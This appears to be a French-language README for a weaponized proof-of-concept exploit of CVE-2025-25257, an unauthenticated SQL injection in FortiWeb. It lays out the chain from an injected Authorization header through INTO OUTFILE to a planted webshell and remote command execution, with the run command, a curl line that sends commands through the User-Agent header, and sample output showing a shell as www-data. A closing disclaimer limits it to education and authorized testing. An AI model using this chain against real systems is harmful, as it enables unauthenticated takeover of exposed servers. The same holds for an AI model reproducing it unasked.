
PoC pour CVE-2025-25257, une injection SQL critique non authentifiée dans FortiWeb. Exploite l'injection SQL via l'en-tête Authorization pour écrire un webshell et obtenir RCE. Aucune connexion requise. Entièrement automatisé.
Injection SQL critique → Exécution de webshell
Découvert et armé par 0xgh057r3c0n
CVE-2025-25257 affecte les systèmes FortiWeb exposant le point d'accès /api/fabric/device/status, qui ne nettoie pas correctement l'entrée de l'en-tête Authorization.
Un attaquant peut effectuer une injection SQL non authentifiée pour écrire un webshell sur le serveur et exécuter des commandes à distance.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE pour déposer un shellpython3 CVE-2025-25257.py -t https://target-host.com
Puis :
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requestsInstallation :
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| Métrique | Valeur |
|---|---|
| Score de base | 9.8 (CRITIQUE) |
| Vecteur d'attaque | Réseau |
| Privilèges requis | Aucun |
| Interaction utilisateur |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
Cette preuve de concept est destinée uniquement à des fins éducatives et de tests autorisés. Utilisez-la à vos risques et périls. L'auteur n'est pas responsable d'une mauvaise utilisation.
| Aucun |
| Impact | Élevé (C/I/A) |